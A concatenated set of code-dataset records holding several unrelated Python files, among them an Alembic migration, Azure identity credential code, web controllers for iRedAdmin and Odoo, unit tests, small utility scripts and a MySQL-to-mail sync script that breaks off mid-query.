math.degrees(math.atan2(_c[1] - _b[1], _c[0] - _b[0]) + math.pi*.5)\n ax = math.sin(math.radians(90-tan)) * y\n by = math.cos(math.radians(90-tan)) * y\n return _c[0]+ax, (y+_c[1])+by\n return _c[0], y+_c[1]\n return pen.nonlinear_transform(bender)\n return _bend\n\n\ndef bend3(curve, tangent=False, offset=(0, 1)):\n def _bend(pen):\n a = curve.value[0][-1][0]\n b, c, d = curve.value[1][-1]\n bh = pen.bounds().h\n \n def bender(x, y):\n c1, c2 = splitCubicAtT(a, b, c, d, offset[0] + (y/bh)*offset[1])\n _, _a, _b, _c = c1\n if tangent:\n tan = math.degrees(math.atan2(_c[1] - _b[1], _c[0] - _b[0]) + math.pi*.5)\n ax = math.sin(math.radians(90-tan)) * y\n by = math.cos(math.radians(90-tan)) * y\n return x+_c[0]+ax, (y+_c[1])+by\n return x+_c[0], _c[1]\n return pen.nonlinear_transform(bender)\n return _bend","sub_path":"coldtype/fx/warping.py","file_name":"warping.py","file_ext":"py","file_size_in_byte":2022,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"357518764","text":"\"\"\"empty message\n\nRevision ID: 66eb78fa61a0\nRevises: 1ffb6ceffcb8\nCreate Date: 2019-02-15 23:48:26.494307\n\n\"\"\"\nfrom alembic import op\nimport sqlalchemy as sa\n\n\n# revision identifiers, used by Alembic.\nrevision = '66eb78fa61a0'\ndown_revision = '1ffb6ceffcb8'\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.create_table('awards_db',\n sa.Column('awards_id', sa.Integer(), nullable=False),\n sa.Column('username', sa.String(length=128), nullable=True),\n sa.Column('password_hash', sa.String(length=128), nullable=True),\n sa.Column('awarding_body', sa.String(length=21), nullable=True),\n sa.Column('awarding_details', sa.String(length=100), nullable=True),\n sa.Column('member_name', sa.String(length=21), nullable=True),\n sa.Column('year', sa.Integer(), nullable=True),\n sa.Column('research_Profile', sa.Integer(), nullable=True),\n sa.ForeignKeyConstraint(['research_Profile'], ['researcher_profile.researcher_id'], ),\n sa.PrimaryKeyConstraint('awards_id')\n )\n # ### end Alembic commands ###\n\n\ndef downgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.drop_table('awards_db')\n # ### end Alembic commands ###\n","sub_path":"migrations/versions/66eb78fa61a0_.py","file_name":"66eb78fa61a0_.py","file_ext":"py","file_size_in_byte":1255,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"249240656","text":"# ------------------------------------\n# Copyright (c) Microsoft Corporation.\n# Licensed under the MIT License.\n# ------------------------------------\nfrom typing import Any, Callable, Optional\n\nfrom azure.core.credentials import AccessToken\nfrom .._internal import AadClient, AsyncContextManager\nfrom .._internal.get_token_mixin import GetTokenMixin\n\n\nclass ClientAssertionCredential(AsyncContextManager, GetTokenMixin):\n \"\"\"Authenticates a service principal with a JWT assertion.\n\n This credential is for advanced scenarios. :class:`~azure.identity.CertificateCredential` has a more\n convenient API for the most common assertion scenario, authenticating a service principal with a certificate.\n\n :param str tenant_id: ID of the principal's tenant. Also called its \"directory\" ID.\n :param str client_id: The principal's client ID\n :param func: A callable that returns a string assertion. The credential will call this every time it\n acquires a new token.\n :paramtype func: Callable[[], str]\n\n :keyword str authority: Authority of an Azure Active Directory endpoint, for example\n \"login.microsoftonline.com\", the authority for Azure Public Cloud (which is the default).\n :class:`~azure.identity.AzureAuthorityHosts` defines authorities for other clouds.\n :keyword List[str] additionally_allowed_tenants: Specifies tenants in addition to the specified \"tenant_id\"\n for which the credential may acquire tokens. Add the wildcard value \"*\" to allow the credential to\n acquire tokens for any tenant the application can access.\n\n .. admonition:: Example:\n\n .. literalinclude:: ../samples/credential_creation_code_snippets.py\n :start-after: [START create_client_assertion_credential_async]\n :end-before: [END create_client_assertion_credential_async]\n :language: python\n :dedent: 4\n :caption: Create a ClientAssertionCredential.\n \"\"\"\n\n def __init__(self, tenant_id: str, client_id: str, func: Callable[[], str], **kwargs: Any) -> None:\n self._func = func\n self._client = AadClient(tenant_id, client_id, **kwargs)\n super().__init__(**kwargs)\n\n async def __aenter__(self):\n await self._client.__aenter__()\n return self\n\n async def close(self) -> None:\n \"\"\"Close the credential's transport session.\"\"\"\n await self._client.close()\n\n async def _acquire_token_silently(self, *scopes: str, **kwargs: Any) -> Optional[AccessToken]:\n return self._client.get_cached_access_token(scopes, **kwargs)\n\n async def _request_token(self, *scopes: str, **kwargs: Any) -> AccessToken:\n assertion = self._func()\n token = await self._client.obtain_token_by_jwt_assertion(scopes, assertion, **kwargs)\n return token\n","sub_path":"sdk/identity/azure-identity/azure/identity/aio/_credentials/client_assertion.py","file_name":"client_assertion.py","file_ext":"py","file_size_in_byte":2807,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"335974199","text":"# encoding: utf-8\n\n# Author: Zhang Huangbin \n\nimport web\nfrom libs import languages, iredutils\nfrom libs.mysql import decorators, admin as adminlib, domain as domainlib\n\ncfg = web.iredconfig\nsession = web.config.get('_session')\n\nclass List:\n @decorators.require_global_admin\n @decorators.require_login\n def GET(self, cur_page=1):\n i = web.input()\n cur_page = int(cur_page)\n\n if cur_page == 0:\n cur_page == 1\n\n adminLib = adminlib.Admin()\n result = adminLib.listAccounts(cur_page=cur_page)\n if result[0] is True:\n (total, records) = (result[1], result[2])\n\n # Get list of global admins.\n allGlobalAdmins = []\n qr = adminLib.getAllGlobalAdmins()\n if qr[0] is True:\n allGlobalAdmins = qr[1]\n\n return web.render(\n 'mysql/admin/list.html',\n cur_page=cur_page,\n total=total,\n admins=records,\n allGlobalAdmins=allGlobalAdmins,\n msg=i.get('msg', None),\n )\n else:\n return web.seeother('/domains?msg=%s' % result[1])\n\n @decorators.require_global_admin\n @decorators.require_login\n def POST(self):\n i = web.input(_unicode=False, mail=[])\n\n self.mails = i.get('mail', [])\n self.action = i.get('action', None)\n msg = i.get('msg', None)\n\n adminLib = adminlib.Admin()\n\n if self.action == 'delete':\n result = adminLib.delete(mails=self.mails,)\n msg = 'DELETED_SUCCESS'\n elif self.action == 'disable':\n result = adminLib.enableOrDisableAccount(accounts=self.mails, active=False,)\n msg = 'DISABLED_SUCCESS'\n elif self.action == 'enable':\n result = adminLib.enableOrDisableAccount(accounts=self.mails, active=True,)\n msg = 'ENABLED_SUCCESS'\n else:\n result = (False, 'INVALID_ACTION')\n\n if result[0] is True:\n return web.seeother('/admins?msg=%s' % msg)\n else:\n return web.seeother('/admins?msg=?' + result[1])\n\nclass Profile:\n @decorators.require_login\n def GET(self, profile_type, mail):\n i = web.input()\n self.mail = web.safestr(mail)\n self.profile_type = web.safestr(profile_type)\n\n if not iredutils.isEmail(self.mail):\n return web.seeother('/admins?msg=INVALID_MAIL')\n\n if session.get('domainGlobalAdmin') is not True and session.get('username') != self.mail:\n # Don't allow to view/update other admins' profile.\n return web.seeother('/profile/admin/general/%s?msg=PERMISSION_DENIED' % session.get('username'))\n\n adminLib = adminlib.Admin()\n result = adminLib.profile(mail=self.mail)\n\n if result[0] is True:\n domainGlobalAdmin, profile = result[1], result[2]\n\n # Get all domains.\n self.allDomains = []\n\n domainLib = domainlib.Domain()\n resultOfAllDomains = domainLib.getAllDomains()\n if resultOfAllDomains[0] is True:\n self.allDomains = resultOfAllDomains[1]\n\n # Get managed domains.\n self.managedDomains = []\n\n qr = adminLib.getManagedDomains(admin=self.mail, domainNameOnly=True, listedOnly=True,)\n if qr[0] is True:\n self.managedDomains += qr[1]\n\n return web.render(\n 'mysql/admin/profile.html',\n mail=self.mail,\n profile_type=self.profile_type,\n domainGlobalAdmin=domainGlobalAdmin,\n profile=profile,\n languagemaps=languages.getLanguageMaps(),\n allDomains=self.allDomains,\n managedDomains=self.managedDomains,\n min_passwd_length=cfg.general.get('min_passwd_length', '0'),\n max_passwd_length=cfg.general.get('max_passwd_length', '0'),\n msg=i.get('msg'),\n )\n else:\n return web.seeother('/admins?msg=' + result[1])\n\n\n @decorators.require_login\n def POST(self, profile_type, mail):\n self.profile_type = web.safestr(profile_type)\n self.mail = web.safestr(mail)\n i = web.input(domainName=[],)\n\n if session.get('domainGlobalAdmin') is not True and session.get('username') != self.mail:\n # Don't allow to view/update others' profile.\n return web.seeother('/profile/admin/general/%s?msg=PERMISSION_DENIED' % session.get('username'))\n\n adminLib = adminlib.Admin()\n result = adminLib.update(\n profile_type=self.profile_type,\n mail=self.mail,\n data=i,\n )\n\n if result[0] is True:\n return web.seeother('/profile/admin/%s/%s?msg=PROFILE_UPDATED_SUCCESS' % (self.profile_type, self.mail))\n else:\n return web.seeother('/profile/admin/%s/%s?msg=%s' % (self.profile_type, self.mail, result[1],))\n\n\nclass Create:\n @decorators.require_global_admin\n @decorators.require_login\n def GET(self):\n i = web.input()\n return web.render(\n 'mysql/admin/create.html',\n languagemaps=languages.getLanguageMaps(),\n default_language=cfg.general.get('lang', 'en_US'),\n min_passwd_length=cfg.general.get('min_passwd_length'),\n max_passwd_length=cfg.general.get('max_passwd_length'),\n msg=i.get('msg'),\n )\n\n @decorators.require_global_admin\n @decorators.require_login\n def POST(self):\n i = web.input()\n self.mail = web.safestr(i.get('mail'))\n\n adminLib = adminlib.Admin()\n result = adminLib.add(data=i)\n\n if result[0] is True:\n # Redirect to assign domains.\n return web.seeother('/profile/admin/general/%s?msg=CREATED_SUCCESS' % self.mail)\n else:\n return web.seeother('/create/admin?msg=' + result[1])\n\n\n","sub_path":"controllers/mysql/admin.py","file_name":"admin.py","file_ext":"py","file_size_in_byte":5983,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"45770409","text":"import base64\nfrom odoo import http\nfrom odoo.http import request\n\nfrom odoo.addons.website.controllers.main import Website\n\nclass Main(Website):\n\n\t#homepage\n\t\"\"\"@http.route('/', type='http', auth='public', website=True)\n\tdef index(self, **kw):\n\t\treturn request.render('lhr_portal.accueil', {} )\"\"\"\n\t@http.route('/page', auth=\"public\", website=True)\n\tdef blank(self):\n\t\treturn request.render('lhr_portal.blank', {})\n\n\n\t@http.route('//formulaire-contact', auth=\"public\", website=True, csrf=False)\n\tdef formulaire_devis(self, lang=None, **post):\n\t\t#récupération des pays\n\t\tcountry_environment = request.env['res.country'] \n\t\tcountries = country_environment.sudo().search([])\n\t\tlanguage = \"fr\" if lang == \"fr_FR\" else \"en\" if lang == \"en_EN\" else \"pt\"\n\t\ttitle = \"Demande de devis\" if language == \"fr\" else \"Quote request\" if language == \"en\" else \"Orçamento personalizado\"\n\t\treturn request.render('lhr_portal.create_operation', { 'countries' : countries, 'lang':language, 'source':post.get('source'), 'title':title,} )\n\n\n\t@http.route('/success', type='http', auth='public', website=True)\n\tdef create_devis(self, **post):\n\n\t\tcontact_environment = request.env['res.partner']\n\n\t\t#do we have to create this contact\n\t\tfullname = ' '.join([post.get('lastname'), post.get('firstname')])\n\n\t\tdomain = ['&', ('name', '=', fullname), ('email', '=', post.get('email'))]\n\t\texisting_contact = contact_environment.sudo().search(domain)\n\n\t\tcontact_id = 0\n\n\t\tif not existing_contact :\n\t\t\tcontact = contact_environment.sudo().create({\n\t\t\t\t'name': fullname,\n\t\t\t\t'phone': post.get('phone'),\n\t\t\t\t'mobile': post.get('mobile'),\n\t\t\t\t'street': post.get('street'),\n\t\t\t\t'zip': post.get('zip'),\n\t\t\t\t'city': post.get('city'),\n\t\t\t\t'email': str(post.get('email')),\n\t\t\t\t'country_id' : int(post.get('country')),\n\t\t\t\t'm_gender': 'man' if str(post.get('gender')) == 'man' else 'woman',\n\t\t\t\t'm_years_old': int(post.get('yo')),\n\t\t\t\t'm_language': post.get('lang'),\n\t\t\t\t'm_graft': False if str(post.get('grafted')) == \"no\" else True,\n\t\t\t\t'm_last_intervention': False if str(post.get('grafted')) == \"no\" else True,\n\t\t\t\t'm_intervention_type': 'fue' if str(post.get('grafted')) == \"fue\" else \"fut\" if str(post.get('grafted')) == \"fut\" else \"\",\n\t\t\t})\n\t\t\tcontact_id = int(contact.id)\n\t\telse :\n\t\t\tcontact_id = int(existing_contact.id)\n\n\t\t#determine baldness degree\n\t\tbaldness_environment = request.env['graft.baldness']\n\t\tdomain = ['&', ('m_gender', '=', post.get('gender')), ('m_case', '=', post.get('case'))]\n\t\tbaldness_id = baldness_environment.sudo().search(domain)\n\n\t\t#determine origin\n\t\torigin = \"\"\n\t\tif post.get('source', False):\n\t\t\t_website = str(post.get('source')).split('.')[1]\n\t\t\torigin = \"jalis\" if _website == \"lisboahair\" else \"arpega\" if _website == \"lisboa-hair\" else \"ehi\" if _website == \"ehi-company\" else \"\"\n\n\t\t#then create new operation with status\n\t\toperation_environment = request.env['graft.operation']\n\t\toperation = operation_environment.sudo().create({\n\t\t\t'm_patient': contact_id,\n\t\t\t'm_message': post.get('message'),\n\t\t\t'm_baldness': int(baldness_id),\n\t\t\t'm_patient_origin' : origin, \n\t\t\t'm_donor_neck_filename' : str(post.get('donor_neck').filename) if post.get('donor_neck',False) else None,\n\t\t\t'm_donor_neck' : base64.b64encode(post.get('donor_neck').read()) if post.get('donor_neck',False) else None,\n\t\t\t'm_donor_side_filename' : str(post.get('donor_side').filename) if post.get('donor_side',False) else None,\n\t\t\t'm_donor_side' : base64.b64encode(post.get('donor_side').read()) if post.get('donor_side',False) else None,\n\t\t\t'm_treat_face_filename' : str(post.get('treat_face').filename) if post.get('treat_face',False) else None,\n\t\t\t'm_treat_face' : base64.b64encode(post.get('treat_face').read()) if post.get('treat_face',False) else None,\n\t\t\t'm_treat_side_filename' : str(post.get('treat_side').filename) if post.get('treat_side',False) else None,\n\t\t\t'm_treat_side' : base64.b64encode(post.get('treat_side').read()) if post.get('treat_side',False) else None,\n\t\t\t'm_treat_top_filename' : str(post.get('treat_top').filename) if post.get('treat_top',False) else None,\n\t\t\t'm_treat_top' : base64.b64encode(post.get('treat_top').read()) if post.get('treat_top',False) else None,\n\t\t})\n\t\treturn request.render('lhr_portal.success', {'source':post.get('source'),'lang':post.get('lang'),} )","sub_path":"lhr_portal/controllers/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":4274,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"300575700","text":"'''\nUnit test the classes in elementy_types module\n\nOnly contains tests for ArrayType since the remaining array_types classes\nare trivial. They are tested in the integrated_tests\n'''\n\nimport numpy as np\n\nfrom gnome.basic_types import world_point_type, oil_status, \\\n status_code_type\n\nfrom gnome.array_types import ArrayType\n\n\nclass TestArrayType_eq(object):\n\n \"\"\"\n contains functions that test __eq__ for ArrayType object\n \"\"\"\n\n def test_eq_wrong_shape(self):\n \"\"\" array shape is different for two ArrayType objects \"\"\"\n\n positions = ArrayType((), world_point_type)\n positions2 = ArrayType((3, ), world_point_type)\n assert positions != positions2\n\n def test_eq_wrong_dtype(self):\n \"\"\" dtype is different for two ArrayType objects \"\"\"\n\n positions = ArrayType((3, ), world_point_type)\n positions2 = ArrayType((3, ), np.int)\n assert positions != positions2 # wrong dtype\n\n def test_eq_wrong_init_value(self):\n \"\"\" initial_value is different for two ArrayType objects \"\"\"\n\n status_codes = ArrayType((), status_code_type,\n oil_status.in_water)\n status_codes2 = ArrayType((), status_code_type)\n assert status_codes != status_codes2 # no init conditions\n\n def test_eq_wrong_attr(self):\n \"\"\" added an attribute so two ArrayType objects are diffferent \"\"\"\n\n positions = ArrayType((), world_point_type)\n positions2 = ArrayType((3, ), world_point_type)\n positions2.test = 'test'\n assert positions != positions2 # wrong number of attributes\n\n def test_eq(self):\n \"\"\" both ArrayType objects are the same \"\"\"\n\n positions = ArrayType((3, ), world_point_type)\n positions2 = ArrayType((3, ), world_point_type)\n assert positions == positions2 # wrong shape\n\n\n","sub_path":"py_gnome/tests/unit_tests/test_array_types.py","file_name":"test_array_types.py","file_ext":"py","file_size_in_byte":1852,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"186504504","text":"#!/usr/bin/env python3\n# This is a light wrapper around https://github.com/ttscoff/gather-cli\n# It does not overwrite the file if it already exists.\n# And it appends the current date / time of download as a comment to the end of the file.\nimport argparse\nimport datetime\nimport os\nimport re\nimport subprocess\n\nHOME = os.environ.get(\"HOME\")\n\n\nclass Settings:\n DEBUG = False\n GATHER_DIR = f\"{HOME}/x/_gather/\"\n\n\ndef run(cmd: list[str]) -> str:\n _cmd = \" \".join(cmd)\n if Settings.DEBUG:\n print(\"------------\")\n print(\"running:\")\n print(_cmd)\n result = subprocess.run(cmd, capture_output=True, text=True)\n if result.returncode == 1:\n print(f\"[ERROR]: {_cmd}\")\n print(result.stdout)\n raise SystemExit\n if Settings.DEBUG:\n print(result.stdout)\n return result.stdout\n\n\ndef main():\n parser = argparse.ArgumentParser(\n description=\"\"\"Download and save markdown for the URL in the clipboard using gather.\n \"\"\"\n )\n parser.add_argument(\"-v\", \"--verbose\", action=\"store_true\")\n args = parser.parse_args()\n Settings.debug = args.verbose\n\n filename = \"%slug.md\"\n tmp_path = f\"{HOME}/tmp/{filename}\"\n final_dir = Settings.GATHER_DIR\n\n cmd = [\"gather\", \"-p\", \"--metadata-yaml\", \"-f\", tmp_path]\n out = run(cmd)\n\n # grab the actual tmp_path since filename uses %s\n m = re.search(r\"Saved to file: ([\\S]+)$\", out)\n fn = None\n if m:\n tmp_path = m.group(1)\n # grab the actual markdown filename off th tmp_path since filename uses %s\n fn = re.search(r\"([^\\/]+$)\", tmp_path).group(1)\n # only move to final destination if target file does not already exist\n cmd = [\"mv\", \"-n\", tmp_path, final_dir]\n run(cmd)\n else:\n print(\"[ERROR] No tmp file........\")\n raise SystemExit(1)\n\n # cleanup tmp file\n if os.path.exists(tmp_path):\n os.remove(tmp_path)\n\n # append downloaded date as comment to end of file\n dt = datetime.datetime.now().strftime(\"%Y-%m-%d--%H-%M\")\n msg = f\"\\n\"\n final_path = os.path.join(final_dir, fn)\n with open(final_path, \"a\") as f:\n f.write(msg)\n\n print(fn)\n cmd = [\"code\", final_path]\n run(cmd)\n\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"bin/dl-markdown.py","file_name":"dl-markdown.py","file_ext":"py","file_size_in_byte":2278,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"620510526","text":"import PySimpleGUI as psg\nimport datetime\n\n\n\nnull = ''\nspaces = ' '\nupdate = '09/18/2021'\nmoney_sign = ''\nmonth = datetime.datetime.today().month\n\n\n\nmonth_names = {\n 1 : 'January',\n 2 : 'February',\n 3 : 'March',\n 4 : 'April',\n 5 : 'May',\n 6 : 'June',\n 7 : 'July',\n 8 : 'August',\n 9 : 'September',\n 10 : 'October',\n 11 : 'November',\n 12 : 'December'\n}\n\n\n\ndef main():\n global money_sign\n\n background = '#D8D8D8'\n\n psg.SetOptions(background_color = background,\n element_background_color = background,\n text_element_background_color = background,\n window_location = (640, 480),\n margins=(5,5),\n text_color = 'Black',\n input_text_color = 'Black',\n button_color = ('Black', 'gainsboro'))\n\n layout = [\n [psg.Text('Made By : Alexandre0911@github.com'), psg.Text('{}Last Update Released : {}'.format(spaces*42, update))],\n [psg.Text('Amount Of Money At The Start Of The Month', size=(33)), psg.InputText(size=(42)), psg.Text('€ / $')],\n [psg.Text('Basic Necessities Money Percentage', size=(33)), psg.InputText(size=(42)), psg.Text('%')],\n [psg.Text('Free Time Money Percentage ', size=(33)), psg.InputText(size=(42)), psg.Text('%')],\n [psg.Text('Financial Liberty Money Percentage ', size=(33)), psg.InputText(size=(42)), psg.Text('%')],\n [psg.Text('Long-Term Expenses Money Percentage', size=(33)), psg.InputText(size=(42)), psg.Text('%')],\n [psg.Text('Financial Instruction Money Percentage', size=(33)), psg.InputText(size=(42)), psg.Text('%')],\n [psg.Text('Donations Money Percentage', size=(33)), psg.InputText(size=(42)), psg.Text('%')],\n [psg.Text('Investments Money Percentage', size=(33)), psg.InputText(size=(42)), psg.Text('%')],\n [psg.Text('Select Currency >>>'), psg.Button('Dollars'), psg.Text('-'), psg.Button('Euros')],\n [psg.Button('Do The Math!'), psg.Text(' '*113), psg.Button('Cancel')]\n ]\n\n window = psg.Window('Money Manager v1.1', layout)\n\n\n\n while True:\n\n event, values = window.read()\n\n if event == psg.WIN_CLOSED or event == 'Cancel':\n\n break\n\n elif event == 'Dollars':\n\n money_sign = ' $'\n psg.PopupOK(' Currency was set to Dollars.', keep_on_top=True)\n\n elif event == 'Euros':\n\n money_sign = ' €'\n psg.PopupOK(' Currency was set to Euros.', keep_on_top=True)\n\n elif event == 'Do The Math!':\n print('First Step >>> {}'.format(values))\n\n try:\n \n if '' in values.values():\n \n psg.PopupOK(' Some box(es) need to be filled!')\n\n except ValueError:\n pass\n\n if money_sign == '':\n psg.PopupOK(' You need to choose a currency!')\n\n elif money_sign != '':\n print('Second Step >>> {}'.format(values))\n\n total_percentage = float(values[1]) + float(values[2]) + float(values[3]) + float(values[4]) + float(values[5]) + float(values[6]) + float(values[7])\n\n if total_percentage == 100.0:\n print('Third Step >>> {}'.format(values))\n\n my_number = float(values[0])\n psg.PopupOK(math(my_number, money_sign, float(values[1]), float(values[2]), float(values[3]), float(values[4]), float(values[5]), float(values[6]), float(values[7])), keep_on_top=True)\n\n else:\n\n psg.PopupOK('The percentages need to add up to 100.0 and they are adding up to {}!'.format(total_percentage))\n \n window.close()\n\n\n\ndef math(x, y, bn, ft, fl, lte, fe, d, i):\n basic_necessities = x * (bn/100)\n free_time = x * (ft/100)\n financial_liberty = x * (fl/100)\n long_term_expenses = x * (lte/100)\n financial_instruction = x * (fe/100)\n donations = x * (d/100)\n investments = x * (i/100)\n\n\n\n file = open('C:\\\\Users\\\\Public\\\\Desktop\\\\Money Management ({}).txt'.format(month_names[month]), mode='w+', encoding='utf-8')\n\n try:\n file.write('''Money For Basic Necessities ({}%) >>> {:.2f}{}\nMoney For Free Time ({}%) >>> {:.2f}{}\nMoney For Financial Liberty ({}%) >>> {:.2f}{}\nMoney For Long-Term Expenses ({}%) >>> {:.2f}{}\nMoney For Financial Education ({}%) >>> {:.2f}{}\nMoney For Donations ({}%) >>> {:.2f}{}\nMoney For Investments ({}%) >>> {:.2f}{}'''.format(bn, basic_necessities, y, ft, free_time, y, fl, financial_liberty, y, lte, long_term_expenses, y, fe, financial_instruction, y, d, donations, y, i, investments, y))\n finally:\n file.close()\n\n\n\n a = 'Money For Basic Necessities >>> {:.2f}{}'.format(basic_necessities, y)\n b = 'Money For Free Time >>> {:.2f}{}'.format(free_time, y)\n c = 'Money For Financial Liberty >>> {:.2f}{}'.format(financial_liberty, y)\n d = 'Money For Long-Term Expenses >>> {:.2f}{}'.format(long_term_expenses, y)\n e = 'Money For Financial Education >>> {:.2f}{}'.format(financial_instruction, y)\n f = 'Money For Donations >>> {:.2f}{}'.format(donations, y)\n g = 'Money For Investments >>> {:.2f}{}'.format(investments, y)\n\n saved = 'Document Saved to Desktop as Money Management ({}).txt'.format(month_names[month])\n\n return '{}\\n{}\\n{}\\n{}\\n{}\\n{}\\n{}\\n\\n{}'.format(a, b, c, d, e, f, g, saved)\n\n\n\nif __name__ == '__main__':\n main()","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":5395,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"413435360","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# @Time : 2019/1/30 9:31\n# @Author : 马飞\n# @File : sync_mysql2mongo.py\n# @Software: PyCharm\n# @func:通过urllib库以以节字泫发送(https协议)post请求\n\nimport sys,time\nimport traceback\nimport configparser\nimport warnings\nimport pymysql\nimport datetime\nimport smtplib\nimport json\nfrom email.mime.text import MIMEText\nimport urllib.parse\nimport urllib.request\nimport ssl\n#ssl._create_default_https_context = ssl._create_unverified_context\n\ndef send_mail465(p_from_user,p_from_pass,p_to_user,p_title,p_content):\n to_user=p_to_user.split(\",\")\n try:\n msg = MIMEText(p_content,'html','utf-8')\n msg[\"Subject\"] = p_title\n msg[\"From\"] = p_from_user\n msg[\"To\"] = \",\".join(to_user)\n server = smtplib.SMTP_SSL(\"smtp.exmail.qq.com\", 465)\n server.set_debuglevel(0)\n server.login(p_from_user, p_from_pass)\n server.sendmail(p_from_user, to_user, msg.as_string())\n server.quit()\n return 0\n except smtplib.SMTPException as e:\n print(e)\n return -1\n\ndef send_mail(p_from_user,p_from_pass,p_to_user,p_title,p_content):\n to_user=p_to_user.split(\",\")\n try:\n msg = MIMEText(p_content,'html','utf-8')\n msg[\"Subject\"] = p_title\n msg[\"From\"] = p_from_user\n msg[\"To\"] = \",\".join(to_user)\n server = smtplib.SMTP(\"smtp.exmail.qq.com\", 25)\n server.set_debuglevel(0)\n server.login(p_from_user, p_from_pass)\n server.sendmail(p_from_user, to_user, msg.as_string())\n server.quit()\n except smtplib.SMTPException as e:\n print(e)\n\ndef exception_info():\n e_str=traceback.format_exc()\n return e_str[e_str.find(\"pymysql.err.\"):]\n\ndef get_now():\n return datetime.datetime.now().strftime(\"%H:%M:%S\")\n\ndef get_time():\n return datetime.datetime.now().strftime(\"%Y-%m-%d %H:%M:%S\")\n\ndef get_date():\n return datetime.datetime.now().strftime(\"%Y%m%d\")\n\ndef get_ds_mysql(ip,port,service ,user,password):\n conn = pymysql.connect(host=ip, port=int(port), user=user, passwd=password, db=service, charset='utf8')\n return conn\n\ndef get_db_mysql(config):\n return get_ds_mysql(config['db_mysql_ip'],config['db_mysql_port'],config['db_mysql_service'],\\\n config['db_mysql_user'],config['db_mysql_pass'])\n\ndef get_config(fname):\n config = {}\n cfg=configparser.ConfigParser()\n cfg.read(fname,encoding=\"utf-8-sig\")\n db_mysql = cfg.get(\"sync\",\"db_mysql\")\n config['db_mysql_ip'] = db_mysql.split(':')[0]\n config['db_mysql_port'] = db_mysql.split(':')[1]\n config['db_mysql_service'] = db_mysql.split(':')[2]\n config['db_mysql_user'] = db_mysql.split(':')[3]\n config['db_mysql_pass'] = db_mysql.split(':')[4]\n config['send_gap'] = cfg.get(\"sync\", \"send_gap\")\n config['send_user'] = cfg.get(\"sync\", \"send_mail_user\")\n config['send_pass'] = cfg.get(\"sync\", \"send_mail_pass\")\n config['acpt_user'] = cfg.get(\"sync\", \"acpt_mail_user\")\n config['mail_title'] = cfg.get(\"sync\", \"mail_title\")\n config['hopson_interface'] = cfg.get(\"sync\",\"hopson_interface\")\n config['db_mysql_string'] = config['db_mysql_ip'] +':'+config['db_mysql_port'] +'/'+config['db_mysql_service']\n return config\n\ndef check_mysql_tab_exists(config,tab):\n db=config['db_mysql_desc']\n cr=db.cursor()\n sql=\"\"\"select count(0) from information_schema.tables\n where table_schema=database() and table_name='{0}'\"\"\".format(tab )\n cr.execute(sql)\n rs=cr.fetchone()\n cr.close()\n db.commit()\n return rs[0]\n\ndef get_mysql_tab_rows(config,tab):\n db=config['db_mysql_desc3']\n cr=db.cursor()\n sql=\"\"\"select count(0) from {0}\"\"\".format(tab )\n cr.execute(sql)\n rs=cr.fetchone()\n cr.close()\n db.commit()\n return rs[0]\n\ndef check_mysql_tab_exists_pk(config,tab):\n db=config['db_mysql_sour']\n cr=db.cursor()\n sql = \"\"\"select count(0) from information_schema.columns\n where table_schema=database() and table_name='{0}' and column_key='PRI'\"\"\".format(tab)\n cr.execute(sql)\n rs=cr.fetchone()\n cr.close()\n db.commit()\n return rs[0]\n\ndef get_seconds(b):\n a=datetime.datetime.now()\n return int((a-b).total_seconds())\n\ndef print_dict(config):\n print('-'.ljust(85,'-'))\n print(' '.ljust(3,' ')+\"name\".ljust(20,' ')+'value')\n print('-'.ljust(85,'-'))\n for key in config:\n print(' '.ljust(3,' ')+key.ljust(20,' ')+'=',config[key])\n print('-'.ljust(85,'-'))\n\ndef format_sql(v_sql):\n return v_sql.replace(\"\\\\\",\"\\\\\\\\\").replace(\"'\",\"\\\\'\")\n\ndef init(config):\n config = get_config(config)\n #print dict\n print_dict(config)\n return config\n\n#判断待办任务是否推送过消息\ndef isSend(config,id):\n db = get_db_mysql(config)\n cr = db.cursor()\n sql = \"select count(0) from ot_workitem_ext where id={0} and isSend='Y'\".format(id)\n cr.execute(sql)\n rs=cr.fetchone()\n if rs[0]>0:\n return True\n else:\n return False\n\ndef get_relationId(config,v_tab,v_bizid):\n db = get_db_mysql(config)\n cr = db.cursor()\n sql = \"select id from {0} where objectid='{1}'\".format(v_tab,v_bizid)\n try:\n cr.execute(sql)\n rs = cr.fetchone()\n cr.close()\n return rs[0]\n except:\n return ''\n\ndef get_itemComment(config,objectid):\n db = get_db_mysql(config)\n cr = db.cursor()\n sql = \"select itemComment from ot_workitemfinished where objectid='{0}'\".format(objectid)\n cr.execute(sql)\n rs1 = cr.fetchone()\n if rs1 is None or rs1[0]=='':\n sql='''\n SELECT TEXT FROM ot_comment m \n WHERE m.WorkItemId='{0}'\n and m.modifiedtime=(select max(modifiedtime) from ot_comment \n where WorkItemId='{1}') limit 1\n '''.format(objectid,objectid)\n cr.execute(sql)\n rs2 = cr.fetchone()\n cr.close()\n if rs2 is None or rs2[0] == '':\n return ''\n else:\n return rs2[0]\n else:\n cr.close()\n return rs1[0]\n\n\n#处理消息类型:1.延时闭店,2.携物出门,3.营运期施工\ndef send_message_easylife(config,debug):\n db = get_db_mysql(config)\n db2 = get_db_mysql(config)\n cr = db.cursor()\n cr2 = db.cursor()\n\n sql= \"\"\"\n SELECT \n b.workflowCode AS '流程模板编码',\n CONCAT('i_',b.workflowCode) AS '流程模板表',\n b.state AS '实例状态',\n b.bizobjectid AS '流程模板表ID', \n a.participantName AS 